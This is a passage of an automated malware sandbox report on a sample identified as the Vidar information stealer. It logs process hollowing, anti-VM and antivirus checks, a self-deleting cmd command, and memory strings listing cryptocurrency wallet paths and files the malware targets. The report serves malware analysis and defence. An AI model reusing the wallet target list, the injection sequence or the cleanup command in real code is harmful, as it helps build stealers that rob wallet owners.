Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

API coverage: 3.1 %

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2848	Thread sleep count: 90 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior

Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareA
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Code function: 2_2_1D732C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_1D732C8E

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Code function: 2_2_1D7346A6 GetProcessHeap,

2_2_1D7346A6

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D732C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		2_2_1D732C8E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7342AF SetUnhandledExceptionFilter,		2_2_1D7342AF

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\82xul16VKj.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\82xul16VKj.exe

Code function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

0_2_02EEBEF0

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\82xul16VKj.exe

Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 value starts with: 4D5A

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\82xul16VKj.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\82xul16VKj.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 425000	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 643000	Jump to behavior

Source: C:\Users\user\Desktop\82xul16VKj.exe	Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: GetLocaleInfoW,	2_2_1D732112
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: GetLocaleInfoW,	2_2_1D732112
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: EnumSystemLocalesW,	2_2_1D90FF17
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_1D73298C

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Code function: 2_2_1D73433C GetSystemTimeAsFileTime,

2_2_1D73433C

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Code function: 2_2_1D914D7C GetTimeZoneInformation,

2_2_1D914D7C

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
